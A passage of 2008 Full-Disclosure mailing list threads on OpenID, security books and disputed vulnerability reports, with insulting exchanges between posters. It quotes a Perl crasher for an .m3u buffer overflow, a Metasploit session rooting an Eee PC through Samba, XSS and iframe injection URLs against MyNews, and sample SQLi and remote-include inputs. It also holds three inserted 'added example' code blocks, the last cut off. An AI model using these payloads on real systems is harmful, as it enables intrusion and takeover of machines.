 system. If the OpenID provider is not vulnerable to common Web attacks
 and it provides good privacy mechanisms such as SSL and the top of
 which are built good authentication features such as one-time tokens,
 etc then OpenID is the preferable choice. Keep in mind though,
 that if your OpenID account is hacked, the attacker will be able to
 login as you anywhere they want. This is the main concern and
 disadvantage.

 pdp

 P.S. dear list, the only reason I am not priv-massaging Steven is
 because I believe that there are other people who are interested in
 this topic. So, instead of wasting valuable resources and energy
 answering everyone individually, I've decided to do it once hoping
 that this message will be seen by others. Thanks!

 On Sun, Mar 23, 2008 at 12:18 PM, Steven Rakick [EMAIL PROTECTED]
 wrote:
  Hello list,
 
   I'm curious what the group thinks about the recent
   surge in support for OpenID across the web and the
   impact it will have.
 
   1) Beemba - http://www.beemba.com
   2) ClaimID - http://www.claimid.com
   3) MyOpenID - http://www.myopenid.com
   4) Many others...
 
   These sites are gaining in popularity quickly and with
   the announcements of support from big players Yahoo,
   AOL, Microsoft and Google, combined with smaller
   web2.0 celeb-run sites like Digg, OpenID appears to
   be what will eventually be the norm.
 
   Thoughts?
 
   I've also noticed that many of these sites are
   bundling Information Card support (CardSpace on
   Windows). Sounds like a good idea as it complements
   OpenID and helps address some weaknesses.
 
   Again, any thoughts?
 
   I'm really just interested in a dialog.
 
   -sr
 
 
 
 



 --

 Petko D. (pdp) Petkov | GNUCITIZEN | Hakiri | Spin Hunters

 gnucitizen.org | hakiri.org | spinhunters.org


[Full-disclosure] perl underground and tssci security

2008-03-22 Thread reepex
For those who do not know, perl underground has released the 5th edition of
their e-zine and it can be found here: http://milw0rm.com/papers/194

I would like to thank the perl underground editors for taking my suggestion
[1]

 how long did it take you to write all 40 lines of your 'labs' code? I shall
 notify perl underground of your horrendous perl and you shall be a source
 of great lulz in their next production.

and publishing the crap code that marcin and his company writes. I believe
PU summarized it best when they said:

# TS/SCI security is a good example of some jerkoffs who want to put
themselves somewhere in the blog
# scene but don't have any content to back them up. So they say let's put
up four or five really
# shitty scripts, in different languages, to show those blog-reading bitches
that we've got skillz,
# but we're going to be too lame to actually get it right or notice the
mistakes, and nobody will read
# our shit anyways so it's all good
# Good thing we have talented people to poke fun at, otherwise we'd rip
apart every fucking piece of
# code you penisgrabbers had up there.

Well said PU. I also find it funny that these local projects are now gone
and the only stuff on the projects page is external links to other people's
work.

[1] http://readlist.com/lists/lists.netsys.com/full-disclosure/8/40475.html

Re: [Full-disclosure] [full disclosure] agile hacking?

2008-03-19 Thread reepex
On Wed, Mar 19, 2008 at 1:35 PM, [EMAIL PROTECTED] wrote:

 % ps ax | grep '[x]yzzy' | wc -l


you could also teach people the -c parameter to grep but I am just a troll

Re: [Full-disclosure] agile hacking?

2008-03-19 Thread reepex
On Wed, Mar 19, 2008 at 6:08 AM, Petko D. Petkov 
[EMAIL PROTECTED] wrote:

 you are the only one backing up troth, read on all comments..


 You are very dense. All the people posting bad about thoth have not seen
his work either. They are mindless sheep following your bad example. Have
you looked at his VMX slides yet?


 I don't bash people.


This made me laugh


 Comparing the Agile Hacking project with books such as How to Own a
 Continent (by FX, Paul Craig, Joe Grand, and Tim Mullen...), How to
 Own the Box (by Ryan Russell, Ido Dubrawsky, FX, and Joe Grand...),
 How to Own a Shadow (by Johnny Long, Tim Mullen, and Ryan
 Russell...), The Art of Intrusion (by Kevin D. Mitnick, and William
 L. Simon..) and the Hacking Exposed series (by some of the most
 recognized information security experts such as, but not only, Johnny
 Cache, Chris Davis, Stuart McClure, Joel Scambray, Andrew Vladimirov,
 Brian Hatch, David Endler...),


Listing the authors does not make a book good.  Have you read any of the
books? Hacking exposed is a collection of lame/outdated/fixed techniques
such as Ping of Death. Lets take a look at the table of contents for hacking
exposed edition 5.

Chapter 1: Footprinting ( lol )
Chapter 2: Scanning ( with no mention of how it works only tools )
Chapter 3: Enumeration
Chapter 4: Hacking Windows
Chapter 5: Hacking Unix

All these chapters do is tell you how to run a bunch of tools looking for
the first outdated service so that you can run a public exploit against it.
If you  want your book to be in the great line of kiddie manuscripts then
you are well on your way.

Re: [Full-disclosure] agile hacking?

2008-03-19 Thread reepex
On Wed, Mar 19, 2008 at 8:49 AM, nnp [EMAIL PROTECTED] wrote:

 Man, you're wasting your breath with these people.

 There's no point in arguing with someone who's willing to title something
 as 'The best  book ever'. Common sense says that unless you're going to
 get experts from every security field to contribute the sum total of their
 knowledge then you're kidding yourself. It will be a decent reference book
 on easy hacks at best. I saw just leave them off. If something good comes of
 it then great, if not then at least you haven't wasted your time berating
 someone that won't listen.


I do not want another horrible 'security' book polluting the market and
ruining more kids who could maybe become skilled people later.

Re: [Full-disclosure] [full disclosure] agile hacking?

2008-03-19 Thread reepex
I think this post sums up best the problem with the hacking exposed series
and the direction pdp's book is going.  Hacking exposed does not explain
anything it only teaches tools and results.  I much prefer books like
'hacking the art of exploitation', 'the art of software security
assessment', and 'secrets of reverse engineering' because they are tool
agnostic and teach the low level concepts that are going on. If I was hiring
people I would much rather someone who understands the details of how
something worked than someone who can only rely on tools and scripts.

Publishing these books only hurts the 'community' by breeding more kiddies
who rely on tools to do everything for them.


On Wed, Mar 19, 2008 at 1:35 PM, [EMAIL PROTECTED] wrote:

 On Wed, 19 Mar 2008 17:30:08 -, Petko D. Petkov said:

  moreover, the project is not a Phrack knock-off as you said. It is
  very different. As I said, it won't contain explanations but like hands
  on tips/tricks and techniques even the most knowledgeable can learn
  from or use as a base reference.

 Without an explanation of *why* a given tip/trick works, it's hard to
 learn from.

 For example, consider the question of Tell me how many processes called
 'xyzzy' are running on a system.  The naive answer is:

 % ps ax | grep xyzzy | wc -l

 However, that generates an off-by-one error because it catches the grep
 itself.

 % ps ax | grep '[x]yzzy' | wc -l

 Does what you wanted - but without an understanding of *why* that regexp
 doesn't match itself when the first example does, you can't apply the more
 general concept of regexps that do/don't match themselves to *other* uses.
 (The secret here - the second regexp is *effectively* identical to the first,
 but says look for an x next to a y in a way that doesn't itself have an
 x adjacent to a y).

 So you need an explanation.

 (The fact that a process can re-write its argv[0] and change the name displayed
 by ps is yet another teachable moment - does that mean that you really want
 the name it was invoked under and should add the 'ps' flag that gives that, or
 do you really want the number of processes that have that modified argv value
 set?  For instance, if you're using 'sendmail', there are a number of states
 a given copy can be in, and you can do a status summary by counting the number
 of 'accepting connections', 'rejecting connections', 'running queue' and other
 similar indicators.

 But again, you need an explanation.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
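
The self-matching grep and the rewritten process titles described in the quoted message above, as an added example that is not part of the original thread. It works on a constructed `ps ax` snapshot (the PIDs, paths and helper function names are made up for illustration) so the counts are reproducible offline.

```shell
#!/bin/sh
# Constructed `ps ax` snapshot: PIDs, paths and states are sample data.
# The sendmail lines carry the status title the daemon writes over its argv.
SNAPSHOT='  PID TTY      STAT   TIME COMMAND
  412 ?        Ss     0:00 /usr/local/bin/xyzzy --daemon
  977 ?        S      0:03 /usr/local/bin/xyzzy --worker
 1203 ?        Ss     0:01 sendmail: accepting connections
 1377 ?        S      0:00 sendmail: running queue
 1421 ?        S      0:00 sendmail: accepting connections
 2356 pts/0    Ss     0:00 -bash'

# The listing as `ps ax | grep PATTERN` sees it: the grep process is already
# running when ps takes its snapshot, so its own command line is in the list.
ps_with_grep() {
    printf '%s\n' "$SNAPSHOT"
    printf ' 2401 pts/0    S+     0:00 grep %s\n' "$1"
}

# Count matching lines; grep -c replaces the trailing `wc -l`.
count_procs() {
    ps_with_grep "$1" | grep -c -- "$1"
}

# Does a pattern, read as a regex, match its own text as typed on the
# command line? That is exactly the condition for the off-by-one.
matches_itself() {
    printf '%s\n' "$1" | grep -q -- "$1"
}

# Status summary built from rewritten process titles: "state=count" lines.
sendmail_states() {
    printf '%s\n' "$SNAPSHOT" |
        sed -n 's/^.*[0-9] sendmail: //p' |
        sort | uniq -c |
        awk '{ n = $1; sub(/^ *[0-9]+ /, ""); print $0 "=" n }'
}

echo "naive   'xyzzy'   -> $(count_procs 'xyzzy')"
echo "bracket '[x]yzzy' -> $(count_procs '[x]yzzy')"
sendmail_states
```

On a live system, `ps -eo pid,comm,args` prints the kernel's task name beside the argv string, so a rewritten title shows up as a difference between the two columns.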

Re: [Full-disclosure] agile hacking?

2008-03-18 Thread reepex
Just because you call me troll doesn't mean you should ignore my questions.

 Who is your book aimed towards? You said this will be the ' best hacking
reference/manual/book ever made' . Doesn't that mean it should contain lots
of low level/kernel level exploitation of which you are incapable? Covering
web based stuff doesn't exactly qualify a book as the best hacking reference
ever made.

It seems you are going to write a grand manual for script kiddies and other
non-talented people who like to run scripts and perform XSS.

Also I find it funny you told rzn that you think of more original ideas
everyday than he does when your two 'ideas' for the book were:

1) running kismet and tcpdump at the same time
2) 'How can you write a small .COM virus without a compiler or any other dev
tools?'

Seeing how both of these have been done 1000s of times (
http://www.awarenetwork.org/home/iqlord/articles/extreme.coding.txt ) how
are your ideas original or interesting?

Your book is going to be lame and grouped in with the mitnick books, how to
own series, and 'hacking exposed' collection.  I guess this isn't new to you
since only CISSPs liked your previous work anyway.

Re: [Full-disclosure] agile hacking?

2008-03-18 Thread reepex
I see thoth responded negatively to your project and again you assume that
if someone bashes you that he/she has no skill and is just trolling. This
means you obviously were not at his kiwicon talk or read the slides ( not
that you would understand them )  but it shows how arrogant you are.

you are just another sad leader who has amassed a following of idiots and
when someone speaks out against you act all high and mighty when really they
are better than you.

I also think it's funny that you say how it's a 'community project' and that
you are uniting all these people together when in truth its a bunch of
clueless kiddies ( I am sure you will get a great article from the kid who
will 'create b0f overfl0wz' as he put it) who follow you while people 'with
a clue' know you are a joke.

Either way if this book somehow gets published it will be another laughing
stock like the rest of your published work.

Re: [Full-disclosure] agile hacking?

2008-03-18 Thread reepex
On Tue, Mar 18, 2008 at 10:36 PM, Nate McFeters [EMAIL PROTECTED]
wrote:

 I don't consider myself a 'kiddie' and I've considered contributing to
 it.  I feel like the old adage of blowing out someone else's flame to make
 yours burn brighter applies here.  Reepex, I didn't get a chance to see your
 presentation at kiwicon, bit too expensive for an American on a tight budget
 to get out there, but if you have a link, I'd love to have a look.  We've
 talked before, so I assume the presentation is good since I know you know
 your stuff; however, I've also seen some cool stuff come out of PDP and
 Gnucitizen... why the need to bash?


I did not give the talk, thoth did. The reason I brought it up is because of
http://www.gnucitizen.org/blog/agile-hacking/#comment-116766
where pdp blindly assumes thoth does not have a clue, while not knowing his
background which must be some strange complex where people think anyone who
disagrees with them is inferior.


   Web app hacking may not be the coolest topic in the world to yourself
 and many others, but it is something that a lot of companies are concerned
 with these days,


Yes and we agreed web hacking has its place... the point I made was that you
cannot write 'the best hacking manual ever made' as pdp is touting it while
only covering web hacking and running combinations of different tools such
as kismet/tcpdump that pdp mentioned as an example.

Re: [Full-disclosure] Local persistent DoS in Windows XP SP2 Taskmanager

2008-03-14 Thread reepex
While I am sure MS is now trembling at the disclosure of such a high impact
bug, I am  wondering why you chose core-security.net as your domain when
core security (.com) is already known as a leading security company with a
good name?

On Fri, Mar 14, 2008 at 2:49 PM, SkyOut [EMAIL PROTECTED] wrote:

 Dear list,

 after weeks of total ignorance by Microsoft I decided to finally release
 all information
 related to a bug, that has to do with the Windows XP SP2 Taskmanager.
 Manipulating
 a Registry key makes it possible to disable the Taskmgr. On the next
 startup it will crash with
 an error message. It is possible to backup the key and repair the Registry
 doing so, but
 the attack scenario is clear: A virus uses this code, the user can't open
 the Taskmgr anymore
 and your process is somehow hidden.

 The full information about this bug, can be found here:
 http://core-security.net/archive/2008/march/index.php#14032008

 And the exploit is available here:
 http://core-security.net/releases/exploits/taskmgr_dos.c.txt

 Greets,
 SkyOut

 ---
 core-security.net
 ---


Re: [Full-disclosure] Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U)

2008-02-15 Thread reepex
can you please stop sending this retarded crap... we all know how much
talent it takes to write thousands of As to a file and then open it with
every application on cnet download.com and sourceforge but we do not care


On Fri, Feb 15, 2008 at 12:07 PM, lorenzo [EMAIL PROTECTED] wrote:


  ###
  #Rosoft Media Player  4.1.8  Remote Buffer Overflow ( .M3U)
  #
  # @nolife : Pow...Pow ..If you are kind i'll show you my set of supers
  mega Tools, fuzzers ,and all the automated stuff  i use For M3U/ASX/PLS
  Pow..Pow ...
  # Nolifing is actually a Disease... Do not be mean with nolife's
  #
  #
  #   eax=41414141 ebx=41414141 ecx= edx=00ba9078 esi=0012eb7c
  edi=00ba9078
  #   eip=00403b9c esp=0012eb4c ebp=0012fb80 iopl=0 nv up ei pl nz
  na pe nc
  #   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=
   efl=00010206
  #   RosoftMediaPlayerFree+0x3b9c:
  #   00403b9c 8b10mov edx,dword ptr [eax]
  ds:0023:41414141=
  #
  #
  my $chars = "A" x 4104;
  my $file = "I_Shot_The_Nolife.m3u";
  open(my $FILE, ">", $file) or die "Cannot open $file: $!";
  print $FILE $chars;
  close($FILE);
  print "$file has been created \n";
  print "Credits:Securfrog";




Re: [Full-disclosure] let's name something after dude vanwinkle

2008-02-15 Thread reepex
On Fri, Feb 15, 2008 at 11:43 AM, worried security 
[EMAIL PROTECTED] wrote:

 gadi evron is a born leader


is this a joke?

Re: [Full-disclosure] Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U)

2008-02-15 Thread reepex
I could not agree more! no talent = do not post ... every one else agree
with me and securfrog?

On Fri, Feb 15, 2008 at 2:06 PM, securfrog [EMAIL PROTECTED] wrote:

 Well ... nice vision here ... then in this case , let's stop
 posting injection sql , xss , rfi , lfi and all kind of web application
 bugs .

 We know how much talent it takes to find these bugs, on these cms you can
 find , on cnet ,
 download.com , sourceforge and stuff.

 [
 var=123
 var=-1+union/* = wow .. injection
 var=scriptalert(document.cookie)/script = wow xss
 var=http://bla.com/file.txt? = wow code exec
 etc ...
 ]

 Let's do the same with ftp servers , finding a CWD AA crash
 is pretty dummy to doh.

 Bugs are now rated by originality, not the impact , thanks for the
 notification reepex .








 2008/2/15, reepex [EMAIL PROTECTED]:

  can you please stop sending this retarded crap... we all know how much
  talent it takes to write thousands of As to a file and then open it with
  every application on cnet download.com and sourceforge but we do not
  care
 
 
  On Fri, Feb 15, 2008 at 12:07 PM, lorenzo [EMAIL PROTECTED] wrote:
 
   ###
#Rosoft Media Player  4.1.8  Remote Buffer Overflow ( .M3U)
#
# @nolife : Pow...Pow ..If you are kind i'll show you my set of
supers mega Tools, fuzzers ,and all the automated stuff  i use For
M3U/ASX/PLS Pow..Pow ...
# Nolifing is actually a Disease... Do not be mean with nolife's
#
#
#   eax=41414141 ebx=41414141 ecx= edx=00ba9078 esi=0012eb7c
edi=00ba9078
#   eip=00403b9c esp=0012eb4c ebp=0012fb80 iopl=0 nv up ei
pl nz na pe nc
#   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=
 efl=00010206
#   RosoftMediaPlayerFree+0x3b9c:
#   00403b9c 8b10mov edx,dword ptr [eax]
ds:0023:41414141=
#
#
my $chars = "A" x 4104;
my $file = "I_Shot_The_Nolife.m3u";
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Credits:Securfrog";
  
  
  

Re: [Full-disclosure] ASUS Eee PC rooted out of the box

2008-02-09 Thread reepex
Why do I get such nonsense said about me because I point out that Eric
Harrison is a script kiddie, Simon Smith is in need of a new security team,
and throwing 5000 As into a buffer is not hacking :(

On Feb 9, 2008 10:36 AM, SilentRunner [EMAIL PROTECTED] wrote:

 Amusing isn't it that every time someone tells reepex to shutup,
 he/she acts as if he/she has a personal or business relationship
 with them, and that somehow he/she is important to this person.
 What transparent bollocks.


Are you referring to Simon Smith? I assume you are. It is just strange that
he would tell me so many times in email how inadequate and useless his
security team is and how he wanted me to work for them, only to then make
fun of me. It seems he is jealous/angry at me for not going with his
company.


 It's the exact tactic used on us when running into one's annoying
 hosebeast of an ex while out with the new missus, and she says but
 you told me last night you loved me, even tho you haven't seen the
 mad bitch for 2 years. reepex has done this at least 3 times in the
 last 3 months and it pretty neatly ages him/her to his/her late
 teens.


After reading this I believe you are a classic E-Psychiatrist [1]

reepex has not contributed one useful thing to full disclosure, so
 I'm more than happy to join with the increasing majority, who would
 like it if he/she STFU.


Yes I have. Ask coderman about my amazing revelation of htaccess in the url
last week, while everyone was talking about 'firefox vulnerabilities'

The good news is that if reepex were older and still exhibiting the
 same psycho-ex-girlfriend behaviour, it is highly unlikely that no-
 one will want to breed with it, so at least the line will stop
 there.


Please see [1].

[1] http://www.encyclopediadramatica.com/E-Psychiatrist

Re: [Full-disclosure] ASUS Eee PC rooted out of the box

2008-02-08 Thread reepex
the default OS 1gb ram limit is very lame, and has made everyone I know
install another OS

On Feb 8, 2008 2:21 PM, [EMAIL PROTECTED] wrote:

 Hi,
  It is a remote root exploit on a very popular piece of hardware, you
 don't
  think that is a big deal?

 from what I've read, most people are sticking WinXP or Ubuntu onto these
 EEPCs as soon as they get them

 alan


Re: [Full-disclosure] ASUS Eee PC rooted out of the box

2008-02-08 Thread reepex
So you ran metasploit and then made a blog post. Is this what 'security
research' is considered now? And why did you write this in such a media
hyped way? Trying to get some spotlight?

On Feb 8, 2008 10:47 AM, RISE Security [EMAIL PROTECTED] wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 We recently acquired an ASUS Eee PC (if you want to know more about it,
 a lot of reviews are available on internet). The first thing we did when
 we put our hands at the ASUS Eee PC was to test its security. The ASUS
 Eee PC comes with a customized version of Xandros operating system
 installed, and some other bundled software like Mozilla Firefox, Pidgin,
 Skype and OpenOffice.org.

 Analysing the running processes of the ASUS Eee PC, the first thing that
 caught our attention was the running smbd process (the sshd daemon was
 started by us, and is not enabled by default).


 eeepc-rise:/root ps -e
  PID TTY  TIME CMD
1 ?00:00:00 fastinit
2 ?00:00:00 ksoftirqd/0
3 ?00:00:00 events/0
4 ?00:00:00 khelper
5 ?00:00:00 kthread
   25 ?00:00:00 kblockd/0
   26 ?00:00:00 kacpid
  128 ?00:00:00 ata/0
  129 ?00:00:00 ata_aux
  130 ?00:00:00 kseriod
  148 ?00:00:00 pdflush
  149 ?00:00:00 pdflush
  150 ?00:00:00 kswapd0
  151 ?00:00:00 aio/0
  152 ?00:00:00 unionfs_siod/0
  778 ?00:00:00 scsi_eh_0
  779 ?00:00:00 scsi_eh_1
  799 ?00:00:00 kpsmoused
  819 ?00:00:00 kjournald
  855 ?00:00:00 fastinit
  857 ?00:00:00 sh
  858 ?00:00:00 su
  859 tty3 00:00:00 getty
  862 ?00:00:00 startx
  880 ?00:00:00 xinit
  881 tty2 00:00:06 Xorg
  890 ?00:00:00 udevd
  952 ?00:00:00 ksuspend_usbd
  953 ?00:00:00 khubd
  1002 ?00:00:00 acpid
  1027 ?00:00:00 pciehpd_event
  1055 ?00:00:00 ifplugd
  1101 ?00:00:00 scsi_eh_2
  1102 ?00:00:00 usb-storage
  1151 ?00:00:00 icewm
  1185 ?00:00:01 AsusLauncher
  1186 ?00:00:00 icewmtray
  1188 ?00:00:01 powermonitor
  1190 ?00:00:00 minimixer
  1191 ?00:00:00 networkmonitor
  1192 ?00:00:00 wapmonitor
  1193 ?00:00:00 x-session-manag
  1195 ?00:00:00 x-session-manag
  1200 ?00:00:00 x-session-manag
  1201 ?00:00:00 dispwatch
  1217 ?00:00:00 cupsd
  1224 ?00:00:00 usbstorageapple
  1234 ?00:00:00 kondemand/0
  1240 ?00:00:00 portmap
  1248 ?00:00:00 keyboardstatus
  1272 ?00:00:00 memd
  1279 ?00:00:00 scim-helper-man
  1280 ?00:00:00 scim-panel-gtk
  1282 ?00:00:00 scim-launcher
  1297 ?00:00:00 netserv
  1331 ?00:00:00 asusosd
  1476 ?00:00:00 xandrosncs-agen
  1775 ?00:00:00 dhclient3
  2002 ?00:00:00 nmbd
  2004 ?00:00:00 smbd
  2005 ?00:00:00 smbd
  2322 ?00:00:00 sshd
  2345 ?00:00:00 sshd
  2356 pts/000:00:00 bash
  2362 pts/000:00:00 ps
 eeepc-rise:/root


 Retrieving the smbd version, we discovered that it runs a vulnerable
 version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit
 we published earlier last year.


 eeepc-rise:/root smbd --version
 Version 3.0.24
 eeepc-rise:/root


 With this information, we ran our exploit against the ASUS Eee PC using
 the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
 Debian based).


 msf  use linux/samba/lsa_transnames_heap
 msf exploit(lsa_transnames_heap)  set RHOST 192.168.50.10
 RHOST = 192.168.50.10
 msf exploit(lsa_transnames_heap)  set PAYLOAD linux/x86/shell_bind_tcp
 PAYLOAD = linux/x86/shell_bind_tcp
 msf exploit(lsa_transnames_heap)  show targets

 Exploit targets:

   Id  Name
   --  
   0   Linux vsyscall
   1   Linux Heap Brute Force (Debian/Ubuntu)
   2   Linux Heap Brute Force (Gentoo)
   3   Linux Heap Brute Force (Mandriva)
   4   Linux Heap Brute Force (RHEL/CentOS)
   5   Linux Heap Brute Force (SUSE)
   6   Linux Heap Brute Force (Slackware)
   7   DEBUG


 msf exploit(lsa_transnames_heap)  set TARGET 1
 TARGET = 1
 msf exploit(lsa_transnames_heap)  exploit
 [*] Started bind handler
 [*] Creating nop sled
 ...
 [*] Trying to exploit Samba with address 0x08415000...
 [*] Connecting to the SMB service...
 [*] Binding to
 12345778-1234-abcd-ef00-0123456789ab:[EMAIL PROTECTED]:192.168.50.10[\lsarpc]
 ...
 [*] Bound to
 12345778-1234-abcd-ef00-0123456789ab:[EMAIL PROTECTED]:192.168.50.10[\lsarpc]
 ...
 [*] Calling the vulnerable function...
 [+] Server did not respond, this is expected
 [*] Command shell session 1 opened (192.168.50.201:33694 -
 192.168.50.10:)
 msf exploit(lsa_transnames_heap)  sessions -i 1
 [*] Starting interaction with 1...

 uname -a
 Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
 GNU/Linux
 id
 uid=0(root) 

Re: [Full-disclosure] ASUS Eee PC rooted out of the box

2008-02-08 Thread reepex
yes and no where in here includes 'make some media hyped report  blog crap
for 5 minutes of fame'

On Feb 8, 2008 2:27 PM, [EMAIL PROTECTED] wrote:

 Security research should go as follows, run some type of scanner to find
 known issues (low hanging fruit). Use your skill to manually try to find
 threats then manually create an exploit then report the issue after
 verified.


 -Original Message-
 From: reepex [EMAIL PROTECTED]
 Sent: Friday, February 8, 2008 2:38pm
 To: RISE Security [EMAIL PROTECTED],
 full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] ASUS Eee PC rooted out of the box

 So you ran metasploit and then made a blog post. Is this what 'security
 research' is considered now? And why did you write this in such a media
 hyped way? Trying to get some spotlight?


Re: [Full-disclosure] ASUS Eee PC rooted out of the box

2008-02-08 Thread reepex
On Feb 8, 2008 3:15 PM, Erik Harrison [EMAIL PROTECTED] wrote:

 I appreciate knowing that I can visit my friends' homes and root their
 boxes while they order pizza
 wirelessly on their couch.


So you can 'root' your friends with a public vulnerability and exploit you
didn't write? Isn't this what most people would call a script kiddie

Re: [Full-disclosure] ASUS Eee PC rooted out of the box

2008-02-08 Thread reepex
hey simon,

Are you still looking to replace your security team because of their
inadequacies? You seemed pretty desperate for skilled workers last time we
talked.

On Feb 8, 2008 3:28 PM, Simon Smith [EMAIL PROTECTED] wrote:

 You would know. ;]

 reepex wrote:
  On Feb 8, 2008 3:15 PM, Erik Harrison [EMAIL PROTECTED]
  mailto:[EMAIL PROTECTED] wrote:
 
  I appreciate knowing that I can visit my friends' homes and root
  their boxes while they order pizza
  wirelessly on their couch.
 
 
  So you can 'root' your friends with a public vulnerability and exploit
  you didn't write? Isn't this what most people would call a script kiddie
 
 
  
 


 --

 - simon

 --
 http://www.snosoft.com



Re: [Full-disclosure] MyNews 1.6.X HTML/JS Injection Vulnerability

2008-02-06 Thread reepex
your 'disclosure' is lame and so is your site. Could you please never email
here again

On Feb 6, 2008 1:06 PM, SkyOut [EMAIL PROTECTED] wrote:

 I know it's basic, but I am a supporter of FD and therefore
 planetluc.com has to be
 blamed now! I checked their script MyNews in version 1.6.4 today and
 then some
 other versions, all are vulnerable to HTML and JS injection.

 --- ADVISORY ---

 
 || WWW.SMASH-THE-STACK.NET ||
 -

 || ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability

 _
 || 0x00: ABOUT ME
 || 0x01: DATELINE
 || 0x02: INFORMATION
 || 0x03: EXPLOITATION
 || 0x04: GOOGLE DORK
 || 0x05: RISK LEVEL
 
 

 _
 || 0x00: ABOUT ME

 Author: SkyOut
 Date: February 2008
 Contact: skyout[-at-]smash-the-stack[-dot-]net
 Website: http://www.smash-the-stack.net/

 _
 || 0x01: DATELINE

 2008-02-06: Bug found
 2008-02-06: Advisory released

 
 || 0x02: INFORMATION

 The MyNews script by planetluc.com in all versions of the 1.6.X tree is
 vulnerable to HTML and JS injection due to no sanitation of the hash
 value in combination with the action admin.

 _
 || 0x03: EXPLOITATION

 No exploit is needed to test this vulnerability. You just need a working
 web browser.

 1: HTML Injection

 To make an HTML injection, visit the website's main page. The name
 might differ from the original name mynews.inc.php, mostly it's called
 index.php. Now construct a malformed URL as follows:

 http://www.example.com/index.php?hash=;iframe src=http://
 www.evil.com/ height=500px width=500px/iframe!--do=admin

 Of course you can manipulate the values of height and width like you
 want to. Do it the way it best fits to your needs!

 2: JavaScript Injection

 JS injection is similar to HTML injection, just that you put a JS code
 in the hash parameter. Let me show you two examples:

 http://www.example.com/index.php?hash=;scriptalert(1337);/
 script!--do=admin

 or

 http://www.example.com/index.php?hash=;scriptalert(XSS);/
 script!--do=admin

 Sometimes using strings doesn't work, so test it first!

 
 || 0x04: GOOGLE DORK

 intext:powered by MyNews 1.6.*

 ___
 || 0x05: RISK LEVEL

 - LOW - (1/3) -

 ! Happy Hacking !

 
 

 THE END

 --- ADVISORY ---

 Sincerely,
 SkyOut

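A defender-side check for the issue the quoted advisory describes, as an added example that is not part of the advisory or of MyNews: it scans web access logs for requests that combine `do=admin` with a `hash` value containing HTML metacharacters, and shows the output encoding that neutralises such a value. The log lines, function names and log format are constructed assumptions.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format), not taken from a real server.
# They resemble the request shape the advisory describes: hash=<markup> with do=admin.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Feb/2008:13:01:10 +0000] "GET /index.php?do=admin&hash=9f2c4e HTTP/1.1" 200 5120
198.51.100.7 - - [06/Feb/2008:13:02:44 +0000] "GET /index.php?hash=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C!--&do=admin HTTP/1.1" 200 5388
198.51.100.7 - - [06/Feb/2008:13:03:02 +0000] "GET /index.php?hash=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fwww.evil.example%2F%3E%3C%2Fiframe%3E%3C!--&do=admin HTTP/1.1" 200 5401
192.0.2.44 - - [06/Feb/2008:13:05:19 +0000] "GET /index.php?hash=%3Cb%3E&do=view HTTP/1.1" 200 4100
192.0.2.44 - - [06/Feb/2008:13:05:30 +0000] "POST /index.php HTTP/1.1" 200 312
"""

# Client address and request target from one log line.
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Characters that let a reflected value break out of an attribute or open a tag.
HTML_META = re.compile(r"[<>\"']")


def suspicious_requests(log_text):
    """Return (client_ip, decoded_hash) for do=admin requests whose hash carries markup."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes, so encoded and raw payloads are treated alike.
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if "admin" not in query.get("do", []):
            continue  # the advisory ties the flaw to the admin action
        for value in query.get("hash", []):
            if HTML_META.search(value):
                hits.append((m.group("ip"), value))
    return hits


def encode_for_html(value):
    """Output encoding that makes a reflected value inert in HTML text or attributes."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(ip, repr(value), "->", encode_for_html(value))
```
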

Re: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities

2008-02-04 Thread reepex
I am not sure the intended point of the exploit since you have @roguehost
and not a proper POC, but I believe all you have triggered is normal
behavior for auto logging into .htaccess protected folders in the form
username:[EMAIL PROTECTED]

http://forum.sambarserver.info/viewtopic.php?p=288
http://www.freewebmasterhelp.com/tutorials/htaccess/3

I did it with google.com and @mail.yahoo.com and it tried to log me into
mail.yahoo.com with google as my username as expected

On Feb 4, 2008 2:10 PM, carl hardwick [EMAIL PROTECTED] wrote:

 Firefox seems to have trouble with defining the proper hostname when
 requesting a ssl connection. I was able to trick Firefox in thinking
 the hostname behind the at-sign is legit and the same as the URI that
 requested an ssl connection, and this without a warning.

 PoC: https://[EMAIL PROTECTED]

 You can add as much garbage between .com and the @ sign.

 So what else can we do?

 PoC:
 [EMAIL PROTECTED]
 [EMAIL PROTECTED]

 ah heck we don't need that at all:
 [EMAIL PROTECTED]

 works fine also :)

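The behaviour discussed in this message (everything before the `@` in a URL authority is userinfo, and the connection goes to the host after it) can be checked mechanically. The following is an added example, not code from either poster: it reports where a URL really connects and flags userinfo that imitates a hostname. The sample URLs and function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Userinfo that starts like a DNS name (dot-separated labels ending in a TLD-like label).
HOSTLIKE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}", re.IGNORECASE)

# Constructed sample URLs using reserved .example names.
SAMPLES = [
    "https://www.bank.example@rogue.example/login",
    "https://www.bank.example%20%20%20%20garbage@rogue.example/",
    "https://alice:s3cret@files.example/private/",
    "https://www.bank.example/redirect@rogue.example",
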